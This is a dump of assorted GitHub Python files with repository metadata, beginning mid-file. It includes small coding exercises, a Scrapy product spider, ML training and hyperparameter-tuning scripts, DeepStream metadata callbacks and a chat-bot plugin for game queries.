means_array.append(means)\r\n stds_array.append(stds)\r\n\r\n samples = torch.cat(sampled_tokens, dim=1)\r\n # samples size = (B,T,1) where B=batch size, T=self.n_weights\r\n samples = samples.squeeze(2)\r\n # samples size = (B,T) where B=batch size, T=self.n_weights\r\n states = [torch.stack(state_array_1, dim=1), torch.stack(state_array_2, dim=1)]\r\n # states = tuple where both elements have size (B,T,Q,H) where B=batch size, T=self.n_dim_out, Q=self.n_layers,\r\n # H=self.hidden_dim\r\n means = torch.cat(means_array, dim=1)\r\n # means size = (B,T,1) where B=batch size, T=self.n_weights\r\n means = means.squeeze(2)\r\n # means size = (B,T) where B=batch size, T=self.n_weights\r\n stds = torch.cat(stds_array, dim=1)\r\n # stds size = (B,T,1) where B=batch size, T=self.n_weights\r\n stds = stds.squeeze(2)\r\n # stds size = (B,T) where B=batch size, T=self.n_weights\r\n return samples, means, stds\r\n\r\n def _get_state(self, batch_size=1):\r\n \"\"\"\r\n Get a batch of initial states. The initial state is just repeated n times where n is the batch size value.\r\n :param batch_size: batch size\r\n :return: batch of initial states\r\n \"\"\"\r\n return self.h0.repeat(batch_size, 1, 1), self.c0.repeat(batch_size, 1, 1)\r\n\r\n def _get_init_input(self, batch_size):\r\n \"\"\"\r\n Get a batch of the initial input. The initial input is just repeated n times where n is the batch size value.\r\n :param batch_size: batch size\r\n :return: batch of the initial input\r\n \"\"\"\r\n return self._init_input_param.expand(batch_size, 1, 1)\r\n\r\n @staticmethod\r\n def _t(a):\r\n return [t.transpose(0, 1).contiguous() for t in a]","repo_name":"albertotamajo/Causal-Reasoning-Research-Internship","sub_path":"CausalDiscovery/experiments/trial.py","file_name":"trial.py","file_ext":"py","file_size_in_byte":11637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37215284420","text":"\nimport Constants\nimport threading\nimport json\nfrom communication.ServerController import ServerController\nfrom communication.Broker import Broker\nfrom session.Session import Session\n\nclass SessionManager(threading.Thread):\n\n verbose = True\n server = None\n broker = None\n sessions = dict()\n\n def __init__(self, verbose=True):\n super().__init__()\n self.verbose = verbose\n self.server = ServerController(\"tcp://localhost:\" + Constants.port, \"session-manager\", verbose)\n self.broker = Broker(verbose)\n self.broker.start()\n\n def run(self):\n while Constants.stop is not True:\n request = self.server.recv()\n if request is None:\n break # Worker was interrupted\n self.process(request)\n self.destroy()\n\n def process(self, request):\n request_data = json.loads(str(request[2], \"UTF-8\"))\n session_id = request_data[\"sessionId\"]\n if request_data[\"requestType\"] == \"REQUEST_CONNECT\":\n self.create_session(session_id, request)\n elif request_data[\"requestType\"] == \"REQUEST_DISCONNECT\":\n self.destroy_session(session_id, request)\n elif request_data[\"requestType\"] == \"REQUEST_CLOSE\":\n self.close()\n\n def create_session(self, session_id, reply):\n print('create session: %s' % session_id)\n session = Session(session_id, self.verbose)\n self.sessions[session_id] = session\n session.start()\n reply[2] = bytes(str(reply[2], \"UTF-8\").replace(\"REQUEST_CONNECT\", \"SESSION_INITIATED\"), \"UTF-8\")\n self.server.send(reply)\n\n\n def destroy_session(self, session_id, reply):\n print('destroy session: %s' % session_id)\n session = self.sessions.pop(session_id)\n session.destroy_session()\n reply[2] = bytes(str(reply[2], \"UTF-8\").replace(\"REQUEST_DISCONNECT\", \"SESSION_CLOSED\"), \"UTF-8\")\n self.server.send(reply)\n\n def close(self):\n print('closing Session Manager...')\n Constants.stop = True\n\n def destroy(self):\n for k, v in self.sessions.items():\n v.destroy_session()\n self.sessions.clear()\n self.server.destroy()\n\n","repo_name":"ojrlopez27/multiuser-framework","sub_path":"Examples/PythonDM/session/SessionManager.py","file_name":"SessionManager.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"19276102132","text":"n = int(input())\n\n\ndef even():\n i = 0\n while True:\n yield i\n i += 2\n\n\n# Don't forget to print out the first n numbers one by one here\nnew_generator = even()\nfor _ in range(n):\n print(next(new_generator))\n","repo_name":"TonyNewbie/PaswordHacker","sub_path":"Problems/Even numbers/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"1066884369","text":"from mpl_toolkits.mplot3d import Axes3D\nimport matplotlib as mpl\nfrom matplotlib import cm\nmpl.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy\nimport numpy as np\n\n\ndef ackley_function(x):\n\t\"given a vector x, output the ackley function\"\n\ty = 20 + numpy.exp(1)\n\ty = y - 20 * numpy.exp((-1. / 5) * numpy.sqrt(numpy.mean(numpy.square(x))))\n\tcos = [numpy.cos(2 * numpy.pi * xi) for xi in x]\n\tcos = numpy.mean(cos)\n\ty = y - cos\n\treturn y\n\n\ndef x2(x):\n\treturn numpy.linalg.norm(x)\n\n\ndef ackley_function_get_batch(batch_size=256, num_dims=2):\n\t\"given a batch size and dimension size, return a batch of x,y sampled from ackley\"\n\tx_batch = numpy.random.uniform(low=-5, high=5, size=num_dims * batch_size)\n\tx_batch = x_batch.reshape(batch_size, num_dims)\n\ty_batch = [ackley_function(x) for x in x_batch]\n\ty_batch = numpy.array(y_batch).reshape(batch_size, 1)\n\treturn x_batch, y_batch\n\n\nif __name__ == \"__main__\":\n\tX = np.arange(-5, 5, 0.5)\n\tY = np.arange(-5, 5, 0.5)\n\tX, Y = np.meshgrid(X, Y)\n\tZ = numpy.zeros_like(X)\n\n\tfor x_index in range(len(X)):\n\t\tfor y_index in range(len(X)):\n\t\t\tarr = numpy.array([X[x_index, y_index], Y[x_index, y_index]])\n\t\t\tZ[x_index, y_index] = ackley_function(arr)\n\n\tfig = plt.figure()\n\tax = fig.gca(projection='3d')\n\n\t# Plot the surface.\n\tsurf = ax.plot_surface(X, Y, Z, cmap=cm.coolwarm, linewidth=0, antialiased=True)\n\n\t# Customize the z axis.\n\t#ax.set_zlim(-1.01, 1.01)\n\n\t# Add a color bar which maps values to colors.\n\tfig.colorbar(surf, shrink=0.5, aspect=5)\n\n\tplt.show()\n","repo_name":"kavosh8/RBFDQN_pytorch","sub_path":"bandit/ackley_problem.py","file_name":"ackley_problem.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"32"} +{"seq_id":"8127962028","text":"from typing import Counter\nimport sys\nfrom reportlab.pdfgen import canvas\nfrom reportlab.rl_config import defaultPageSize\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\n\n# for \nimport csv\n\n# Import vertical text class\nfrom rotatedtext import verticalText\n\nwidth = 5\nheight = 3\nfont_size = 26\nfont = 'Ace'\ncard_spacing = 0\nspacing = 12 # smaller is a bigger space when multi-line\nadjuster = 1.55 # spacing for 180 rotations\n\n# get arguments\nif len(sys.argv) == 2:\n font_size = int(sys.argv[1])\n\n# Read in the CSV\ndef get_file(file):\n names = []\n with open(file) as csvfile:\n reader = csv.reader(csvfile, delimiter='\\n')\n for row in reader:\n names.append(row)\n if len(names) % 2 != 0:\n names.append([\"\"])\n return names\n\n\ndef return_array(num, div):\n counter = 0\n div_list = []\n gap = num / div\n while len(div_list) < div:\n counter = counter + gap\n div_list.append(counter)\n return div_list\n\ndef setCan(canvas):\n canvas.setFont(font, font_size)\n canvas.setLineWidth(.0002)\n\n\ndef generate_pdf(uploaded_file):\n names = get_file(uploaded_file)\n can = canvas.Canvas('cards.pdf', bottomup = False)\n pdfmetrics.registerFont(TTFont('Ace', 'ace.ttf'))\n setCan(can)\n PAGE_WIDTH = defaultPageSize[0]\n PAGE_HEIGHT = defaultPageSize[1]\n\n width_array = return_array(PAGE_HEIGHT, width)\n #height_array = return_array(PAGE_WIDTH, height)\n height_array = [PAGE_WIDTH/4, 3 * (PAGE_WIDTH/4)]\n\n width_line = return_array(PAGE_HEIGHT, width*4)\n width_line = width_line[::2]\n height_line = return_array(PAGE_WIDTH, height*2)\n #height_line = height_line[::2]\n\n\n def drawLine(can):\n # Draw grid lines\n # center line\n can.line(PAGE_WIDTH/2, 0, PAGE_WIDTH/2, PAGE_HEIGHT)\n for lines_w in width_line:\n for lines_h in height_line:\n # horizontal lines\n can.line(0, lines_w - font_size/4, PAGE_WIDTH, lines_w - font_size/4)\n # vertical lines\n # can.line(lines_h, 0, lines_h, PAGE_HEIGHT)\n\n\n x_counter = 0\n y_counter = 0\n drawLine(can)\n\n # Print Content\n for text in names:\n if x_counter == width - 1:\n y_counter = y_counter + 1\n x_counter = 0\n if y_counter == height - 1:\n can.showPage()\n setCan(can)\n drawLine(can)\n y_counter = 0\n if can.stringWidth(text[0]) > PAGE_WIDTH/2 - 40:\n text_array = text[0].split(\" \", 1)\n if can.stringWidth(text_array[1]) > PAGE_WIDTH/2 - 40:\n can.setFont(font, font_size/1.2)\n\n can.drawString(height_array[y_counter] - can.stringWidth(text_array[0])/2, width_array[x_counter] - width_array[0]/spacing, text_array[0])\n can.drawString(height_array[y_counter] - can.stringWidth(text_array[1])/2, width_array[x_counter] + width_array[0]/spacing, text_array[1])\n can.saveState()\n can.rotate(180)\n can.drawString(-height_array[y_counter] - can.stringWidth(text_array[1])/2, -width_array[x_counter] + height_array[0]/adjuster + width_array[0]/spacing, text_array[1])\n can.drawString(-height_array[y_counter] - can.stringWidth(text_array[0])/2, -width_array[x_counter] + height_array[0]/adjuster - width_array[0]/spacing, text_array[0])\n can.restoreState()\n setCan(can)\n else:\n can.drawString(height_array[y_counter] - can.stringWidth(text[0])/2, width_array[x_counter], text[0])\n can.saveState()\n can.rotate(180)\n can.drawString(-height_array[y_counter] - can.stringWidth(text[0])/2, -width_array[x_counter] + height_array[0]/adjuster, text[0])\n can.restoreState()\n x_counter = x_counter + 1\n\n # Add a page of lines, then save\n can.save()\n\n","repo_name":"smitty001/name_cards","sub_path":"generator/placecardsv2.py","file_name":"placecardsv2.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20534839387","text":"import os\nfrom itertools import izip_longest\nfrom scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Request, HtmlResponse\nfrom scrapy.utils.url import urljoin_rfc\nfrom scrapy.utils.response import get_base_url\n\nfrom product_spiders.items import Product\nfrom axemusic_item import ProductLoader\n\n\nclass AcclaimMusicSpider(BaseSpider):\n name = 'acclaim-music.com'\n allowed_domains = ['acclaim-music.com']\n start_urls = ['http://www.acclaim-music.com/search.php?mode=search&page=1']\n\n def parse(self, response):\n hxs = HtmlXPathSelector(response)\n products = hxs.select('//ul[@id=\"search-results\"]/li/span[@class=\"wrapper\"]')\n\n for product in products:\n loader = ProductLoader(item=Product(), response=response)\n loader.add_value('name', product.select('.//span[@class=\"product-title\"]/a/text()').extract()[0])\n url = product.select('.//span[@class=\"product-title\"]/a/@href').extract()[0]\n loader.add_value('url', url)\n try:\n loader.add_value('price', product.select('.//span[@class=\"product-ourprice\"]/text()').extract()[0])\n except IndexError:\n loader.add_value('price', 0)\n yield Request(url, callback=self.parse_product, meta={'loader': loader})\n pages = hxs.select('//div[contains(@class, \"nav-pages\")][1]//a/@href').extract()\n if pages:\n url = urljoin_rfc(get_base_url(response), pages[-1])\n yield Request(url, callback=self.parse)\n\n def parse_product(self, response):\n hxs = HtmlXPathSelector(response)\n loader = response.meta.get('loader')\n\n try:\n brand = hxs.select('//div[@id=\"location\"]/span/a[@class=\"bread-crumb\"]/span/text()').extract()[-2]\n except:\n brand = None\n try:\n category = hxs.select('//div[@id=\"location\"]/span/a[@class=\"bread-crumb\"]/span/text()').extract()[-1]\n except:\n category = None\n image_url = hxs.select('//div[@class=\"image-box\"]/img/@src').extract()\n identifier = hxs.select('//input[@name=\"productid\"]/@value').extract()[0]\n sku = hxs.select('//tr[td/text()=\"Model #\"]/td[not(text()=\"Model #\")]/text()').extract()\n if not sku:\n sku = hxs.select('//tr[td/text()=\"Model\"]/td[not(text()=\"Model\")]/text()').extract()\n if sku:\n loader.add_value('sku', sku[0].strip())\n loader.add_value('category', category.replace(' - ' + brand, '') if brand else category)\n loader.add_value('identifier', identifier)\n if brand:\n loader.add_value('brand', brand)\n loader.add_value('image_url', image_url)\n yield loader.load_item()\n\n\n\n def _grouper(self, n, iterable, fillvalue=None):\n '''\n grouper(3, 'ABCDEFG', 'x') --> ABC DEF Gxx\n '''\n args = [iter(iterable)] * n\n return izip_longest(fillvalue=fillvalue, *args)\n","repo_name":"Godsoo/scraping","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/axemusic/acclaimmusic_spider.py","file_name":"acclaimmusic_spider.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26786275469","text":"\n\ndef transform(current, target, grid):\n\n if target%2 == 0: \n \n height = len(grid)\n width = len(grid[0])\n\n strap = ['O'] * width\n res = []\n for _ in range(height):\n res.append(''.join(strap))\n\n return res\n\n else: \n if current+1 == target or current == target:\n return grid\n else: \n return transform(current+2, target, step(grid))\n\n\ndef step(grid):\n\n height = len(grid)\n width = len(grid[0])\n\n res = []\n for i in range(height):\n strap = []\n\n for j in range(width):\n\n left_cell = checlleftCellFor(i,j,grid)\n right_cell = checkRightCellFor(i,j,grid)\n top_cell = checkTopCellFor(i,j,grid)\n bottom_cell = checkBottomCellFor(i,j,grid)\n self_cell = checkSelf(i,j,grid)\n\n if left_cell or right_cell or top_cell or bottom_cell or self_cell:\n strap.append('.')\n else:\n strap.append('O') \n\n res.append(''.join(strap))\n\n return res\n\n\ndef checkTopCellFor(i, j, grid):\n\n if i == 0:\n return False\n elif ord(grid[i-1][j]) == 79:\n return True\n else :\n return False\n\ndef checlleftCellFor(i, j, grid):\n\n if j == 0:\n return False\n elif ord(grid[i][j-1]) == 79:\n return True\n else :\n return False\n\ndef checkRightCellFor(i, j, grid):\n\n width = len(grid[0])\n\n if j == width-1:\n return False\n elif ord(grid[i][j+1]) == 79:\n return True\n else :\n return False\n\ndef checkBottomCellFor(i, j, grid):\n\n height = len(grid)\n\n if i == height-1:\n return False\n elif ord(grid[i+1][j]) == 79:\n return True\n else :\n return False\n\ndef checkSelf(i, j, grid):\n\n if ord(grid[i][j]) == 79:\n return True\n else :\n return False\n\ndef bomberMan(n, grid):\n x = n%4 \n if x == 1 and n>1: \n x += 4\n return transform(1, x, grid)\n\n\ngrid= ['O..OO........O..O........OO.O.OO.OO...O.....OOO...OO.O..OOOOO...O.O..O..O.O..OOO..O..O..O....O...O....O...O..O..O....O.O.O.O.....O.....OOOO..O......O.O.....OOO....OO....OO....O.O...O..OO....OO..O...O']\nprint(bomberMan(19, grid))\n","repo_name":"AmitabhaSaha/HackerRankSolutions","sub_path":"Bomberman.py","file_name":"Bomberman.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1702377860","text":"# Threading模块\n\nimport threading # 多线程 threading模块\nimport time\n\n############ 传统方式 单线程 ############\n# def coding():\n# for x in range(3):\n# print('正在写代码%s'%x)\n# time.sleep(1)\n#\n# def drawing():\n# for x in range(3):\n# print('正在画图%s'%x)\n# time.sleep(1)\n#\n# def main():\n# coding()\n# drawing()\n#\n# if __name__ == '__main__':\n# main()\n\n\n############ 采用多线程 ############\n\ndef coding():\n for x in range(3):\n print('正在写代码%s' %threading.current_thread())\n # threading.current_thread()是当前线程的名称\n time.sleep(1)\n\ndef drawing():\n for x in range(3):\n print('正在画图%s' %threading.current_thread())\n time.sleep(1)\n\ndef main():\n t1 = threading.Thread(target=coding)\n t2 = threading.Thread(target=drawing)\n\n t1.start()\n t2.start()\n\n print(threading.enumerate()) # threading.enumerate()函数查看线程数\n\nif __name__ == '__main__':\n main()","repo_name":"Mocha-Pudding/Scrapy-Redis_Demos","sub_path":"Thread_demo/demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"32"} +{"seq_id":"38177927994","text":"from collections import deque\nfrom typing import List\n\n\nclass Solution:\n def updateMatrix(self, mat: List[List[int]]) -> List[List[int]]:\n m = len(mat)\n n = len(mat[0])\n\n max_path_len = m * n\n\n d = deque()\n\n for i in range(m):\n for j in range(n):\n if mat[i][j] == 0:\n d.append((i, j))\n else:\n mat[i][j] = max_path_len\n\n while d:\n i, j = d.popleft()\n for dx, dy in ((-1, 0), (1, 0), (0, -1), (0, 1)):\n ii, jj = i + dx, j + dy\n if ii < 0 or ii >= m or jj < 0 or jj >= n:\n continue\n if mat[ii][jj] > mat[i][j] + 1:\n mat[ii][jj] = mat[i][j] + 1\n d.append((ii, jj))\n\n return mat\n\n\nprint(Solution().updateMatrix([[0, 0, 0], [0, 1, 0], [1, 1, 1]]))\n","repo_name":"blockinhead/algo_python","sub_path":"leetcode/542_01_matrix.py","file_name":"542_01_matrix.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38936884598","text":"import random\n\nVOWELS = \"aeiou\"\nCONSONANTS = \"bcdfghjklmnpqrstvwxyz\"\nword_format = \"%#*\"\nwords = \"\"\n\nletter_random = random.choice(word_format)\n\n\ndef main():\n print(is_valid_format(words))\n\n\ndef is_valid_format(words):\n for kind in letter_random.lower():\n if kind == \"%\" or \"*\":\n words += random.choice(CONSONANTS)\n return words\n elif kind == \"#\":\n words += random.choice(VOWELS)\n return words\n else:\n words += words\n return words\n\n\nmain()\n","repo_name":"imnkywf/CP1404praticals","sub_path":"Prac_03/word_generator.py","file_name":"word_generator.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15782066504","text":"import cv2 as cv\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\n\r\nmnist = tf.keras.datasets.mnist #we already know the flassifications of all these digits\r\n(x_train, y_train), (x_test, y_test) = mnist.load_data() #this load data function loads the mnist data and already splits it into training and testing data.\r\n#it uses a 20% or a 10% split, but most of the data is contained in the training data and we use a couple of the examples in order to validate to evaluate them all\r\n\r\nx_train = tf.keras.utils.normalize(x_train, axis=1)\r\nx_test = tf.keras.utils.normalize(x_test, axis=1)\r\n\r\n#create a new model\r\nmodel = tf.keras.models.Sequential() #basically saying that we create an ordinary feedforward neural network\r\n\r\n#build the model\r\n\r\n#add some layers\r\nmodel.add(tf.keras.layers.Flatten(input_shape=(28,28))) #flatten the layer with all the pixels off each individual image of a handwritten digit and we feed that into the input layer and then this input layer is followed by a dense layer\r\n#add the dense layer\r\nmodel.add(tf.keras.layers.Dense(units=128, activation=tf.nn.relu)) #number of neurons that we are gonna have in this layer - the more neurons the more complicated the layer becomes. The activation function is a simple rectify linear unit function\r\n#add the second hidden layer\r\nmodel.add(tf.keras.layers.Dense(units=128, activation=tf.nn.relu))\r\n#output layer\r\nmodel.add(tf.keras.layers.Dense(units=10, activation=tf.nn.softmax)) #this activation function is the function that tries to take all the outputs\r\n\r\n#we need to comple them all\r\nmodel.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])\r\n\r\n#fit the model\r\nmodel.fit(x_train, y_train, epochs=3) #the model is going to repeat the whole process 3 times\r\n\r\n#evaluate them all\r\nloss, accuracy = model.evaluate(x_test, y_test)\r\n\r\nprint(accuracy)\r\nprint(loss)\r\n\r\nmodel.save('digits.model')\r\n\r\n","repo_name":"mgichenko/HandWritten-Digit-Recognition","sub_path":"HandwrittenDigitRecognition.py","file_name":"HandwrittenDigitRecognition.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9889828637","text":"import copy\nimport pickle\nfrom typing import Dict\n\nimport pandas as pd\nfrom kaggle_airbnb.config import (default_irrelevant_features, model_path,\n results_path, test_data_path,\n train_data_path)\nfrom kaggle_airbnb.preprocess import preprocess_feature\nfrom ray import tune\nfrom ray.tune.schedulers.hb_bohb import HyperBandForBOHB\nfrom ray.tune.suggest.bohb import TuneBOHB\nfrom sklearn.model_selection import train_test_split\n\n\ndef get_opt_algo(name: str):\n scheduler = None\n opt_algo = None\n\n if name == \"bohb\":\n scheduler = HyperBandForBOHB(\n time_attr=\"training_iteration\",\n max_t=100,\n reduction_factor=4,\n stop_last_trials=False)\n opt_algo = tune.suggest.ConcurrencyLimiter(TuneBOHB(), max_concurrent=4)\n\n return scheduler, opt_algo\n\n\ndef train(config: Dict):\n # This is a simple training function to be passed into Tune\n # Load dataset\n df = pd.read_csv(train_data_path)\n irrelevant_features = config.pop('irrelevant_features')\n data = preprocess_feature(df, irrelevant_features)\n labels = df[\"Decision\"].to_numpy()\n\n algo_wrapper_cls = None\n # Split into train and test set\n train_x, test_x, train_y, test_y = train_test_split(\n data, labels, test_size=0.1)\n\n # Train the classifier, using the Tune callback\n algo_wrapper_cls = config.pop(\"algo_wrapper_cls\")\n algo = algo_wrapper_cls(config)\n algo.fit(train_x, train_y)\n test_acc = algo.evaluate(test_x, test_y)\n\n tune.report(acc=test_acc)\n algo.save(\"model.pkl\")\n\n\ndef get_best_model(analysis):\n best_logdir = analysis.get_best_logdir()\n with open(f\"{best_logdir}/model.pkl\", \"rb\") as f:\n best_model = pickle.load(f)\n accuracy = analysis.best_result[\"acc\"]\n print(f\"Best model parameters: {analysis.best_config}\")\n print(f\"Best model total accuracy: {accuracy:.4f}\")\n\n return best_model\n\n\ndef tune_algo(search_space: Dict,\n num_samples: int = 1000,\n n_cpus: int = 1):\n\n scheduler, opt_algo = get_opt_algo(\"bohb\")\n\n analysis = tune.run(\n train,\n metric=\"acc\",\n mode=\"max\",\n resources_per_trial={\"cpu\": n_cpus},\n config=search_space,\n num_samples=num_samples,\n scheduler=scheduler,\n search_alg=opt_algo\n )\n\n return analysis\n\n\ndef test(best_model, algo_name):\n df = pd.read_csv(test_data_path)\n\n features_to_remove = copy.copy(default_irrelevant_features)\n features_to_remove.remove(\"Decision\")\n x = preprocess_feature(df, features_to_remove)\n y = best_model.predict(x)\n\n res_dict = {\"id\": df.id, \"Decision\": y}\n res_df = pd.DataFrame.from_dict(res_dict)\n res_df.to_csv(f\"{results_path}/{algo_name}.csv\", index=False)\n best_model.save(f\"{model_path}/{algo_name}.pkl\")\n","repo_name":"Mushroom-Wang/kaggle-airbnb","sub_path":"kaggle_airbnb/tune.py","file_name":"tune.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6241610468","text":"import pyds\nimport sys\n\nMAX_TIME_STAMP_LEN = 32\n\n# Callback function for deep-copying an NvDsEventMsgMeta struct\ndef meta_copy_func(data, user_data):\n # Cast data to pyds.NvDsUserMeta\n user_meta = pyds.NvDsUserMeta.cast(data)\n src_meta_data = user_meta.user_meta_data\n # Cast src_meta_data to pyds.NvDsEventMsgMeta\n srcmeta = pyds.NvDsEventMsgMeta.cast(src_meta_data)\n # Duplicate the memory contents of srcmeta to dstmeta\n # First use pyds.get_ptr() to get the C address of srcmeta, then\n # use pyds.memdup() to allocate dstmeta and copy srcmeta into it.\n # pyds.memdup returns C address of the allocated duplicate.\n dstmeta_ptr = pyds.memdup(pyds.get_ptr(srcmeta),\n sys.getsizeof(pyds.NvDsEventMsgMeta))\n # Cast the duplicated memory to pyds.NvDsEventMsgMeta\n dstmeta = pyds.NvDsEventMsgMeta.cast(dstmeta_ptr)\n\n # Duplicate contents of ts field. Note that reading srcmeat.ts\n # returns its C address. This allows to memory operations to be\n # performed on it.\n dstmeta.ts = pyds.memdup(srcmeta.ts, MAX_TIME_STAMP_LEN + 1)\n\n # Copy the sensorStr. This field is a string property. The getter (read)\n # returns its C address. The setter (write) takes string as input,\n # allocates a string buffer and copies the input string into it.\n # pyds.get_string() takes C address of a string and returns the reference\n # to a string object and the assignment inside the binder copies content.\n dstmeta.sensorStr = pyds.get_string(srcmeta.sensorStr)\n\n if srcmeta.objSignature.size > 0:\n dstmeta.objSignature.signature = pyds.memdup(\n srcmeta.objSignature.signature, srcmeta.objSignature.size)\n dstmeta.objSignature.size = srcmeta.objSignature.size\n \n return dstmeta\n\n\n# Callback function for freeing an NvDsEventMsgMeta instance\ndef meta_free_func(data, user_data):\n user_meta = pyds.NvDsUserMeta.cast(data)\n srcmeta = pyds.NvDsEventMsgMeta.cast(user_meta.user_meta_data)\n\n # pyds.free_buffer takes C address of a buffer and frees the memory\n # It's a NOP if the address is NULL\n pyds.free_buffer(srcmeta.ts)\n pyds.free_buffer(srcmeta.sensorStr)\n\n if srcmeta.objSignature.size > 0:\n pyds.free_buffer(srcmeta.objSignature.signature)\n srcmeta.objSignature.size = 0\n \n\ndef generate_event_msg_meta(obj_meta, frame_meta):\n msg_meta = pyds.alloc_nvds_event_msg_meta()\n msg_meta.bbox.top = obj_meta.rect_params.top\n msg_meta.bbox.left = obj_meta.rect_params.left\n msg_meta.bbox.width = obj_meta.rect_params.width\n msg_meta.bbox.height = obj_meta.rect_params.height\n msg_meta.frameId = frame_meta.frame_num\n msg_meta.trackingId = obj_meta.object_id\n msg_meta.confidence = obj_meta.confidence\n \n msg_meta.sensorId = 0\n msg_meta.placeId = 0\n msg_meta.moduleId = 0\n msg_meta.sensorStr = \"sensor-0\"\n \n msg_meta.ts = pyds.alloc_buffer(MAX_TIME_STAMP_LEN + 1)\n pyds.generate_ts_rfc3339(msg_meta.ts, MAX_TIME_STAMP_LEN)\n\n msg_meta.type = pyds.NvDsEventType.NVDS_EVENT_ENTRY\n msg_meta.objType = pyds.NvDsObjectType.NVDS_OBJECT_TYPE_PERSON\n msg_meta.objClassId = obj_meta.class_id\n if obj_meta.class_id == 0:\n msg_meta.objType = pyds.NvDsObjectType.NVDS_OBJECT_TYPE_VEHICLE\n elif obj_meta.class_id == 2:\n msg_meta.objType = pyds.NvDsObjectType.NVDS_OBJECT_TYPE_PERSON\n \n return msg_meta","repo_name":"Serge3006/deepstream-kafka","sub_path":"pipeline/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":3420,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"73409977690","text":"from .api import *\nfrom .xuanjing import *\nfrom .monster import *\n\nzones = on_command(\"jx3_zones_v1\", aliases={\"副本v1\"}, priority=5)\n\n@zones.handle()\nasync def _(bot: Bot, event: GroupMessageEvent, args: Message = CommandArg()):\n \"\"\"\n 获取玩家副本通关记录:\n\n Example:-副本v1 幽月轮 哭包猫@唯我独尊\n \"\"\"\n group_server = getGroupServer(str(event.group_id))\n arg = args.extract_plain_text().split(\" \")\n if len(arg) not in [1, 2]:\n await zones.finish(\"唔……参数不正确哦,请检查后重试~\")\n if len(arg) == 1:\n if group_server == False:\n await zones.finish(\"没有绑定服务器,请携带服务器参数使用!\")\n server = group_server\n id = arg[0]\n elif len(arg) == 2:\n server = arg[0]\n id = arg[1]\n data = await zone(server, id)\n if type(data) == type([]):\n await zones.finish(data[0])\n else:\n await zones.finish(ms.image(data))\n\nzonesv2 = on_command(\"jx3_zones\", aliases={\"副本\"}, priority=5)\n\n@zonesv2.handle()\nasync def _(event: GroupMessageEvent, args: Message = CommandArg()):\n group_server = getGroupServer(str(event.group_id))\n arg = args.extract_plain_text().split(\" \")\n if len(arg) not in [1, 2]:\n await zonesv2.finish(\"唔……参数不正确哦,请检查后重试~\")\n if len(arg) == 1:\n if group_server == False:\n await zonesv2.finish(\"没有绑定服务器,请携带服务器参数使用!\")\n server = group_server\n id = arg[0]\n elif len(arg) == 2:\n server = arg[0]\n id = arg[1]\n data = await zone_v2(server, id)\n if type(data) == type([]):\n await zonesv2.finish(data[0])\n else:\n await zonesv2.finish(ms.image(data))\n\ndrops = on_command(\"jx3_drops\", aliases={\"掉落列表\"}, priority=5)\n\n@drops.handle()\nasync def _(event: GroupMessageEvent, args: Message = CommandArg()):\n arg = args.extract_plain_text().split(\" \")\n if len(arg) != 3:\n await drops.finish(\"唔……参数不正确哦~\")\n map = arg[0]\n mode = arg[1]\n boss = arg[2]\n data = await generater(map, mode, boss)\n from nonebot.log import logger\n logger.info(data)\n if type(data) != type([]):\n await drops.finish(ms.image(data))\n else:\n await drops.finish(data[0])\n\nitem = on_command(\"jx3_itemdrop\", aliases={\"掉落\"}, priority=5)\n\n@item.handle()\nasync def _(event: GroupMessageEvent, args: Message = CommandArg()):\n group_server = getGroupServer(str(event.group_id))\n arg = args.extract_plain_text().split(\" \")\n if len(arg) not in [1, 2]:\n await item.finish(\"唔……参数不正确哦,请检查后重试~\")\n if len(arg) == 1:\n if group_server == False:\n await item.finish(\"没有绑定服务器,请携带服务器参数使用!\")\n server = group_server\n name = arg[0]\n elif len(arg) == 2:\n server = arg[0]\n name = arg[1]\n data = await get_item_record(server, name)\n if type(data) == type([]):\n await item.finish(data[0])\n else:\n await item.finish(ms.image(data))\n\nmonsters = on_command(\"jx3_monsters_v2\", aliases={\"百战\"}, priority=5)\n@monsters.handle()\nasync def _(event: GroupMessageEvent, args: Message = CommandArg()):\n img = await get_monsters_map()\n await monsters.finish(ms.image(img))","repo_name":"codethink-cn/Inkar-Suki","sub_path":"src/plugins/jx3/dungeon/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"32"} 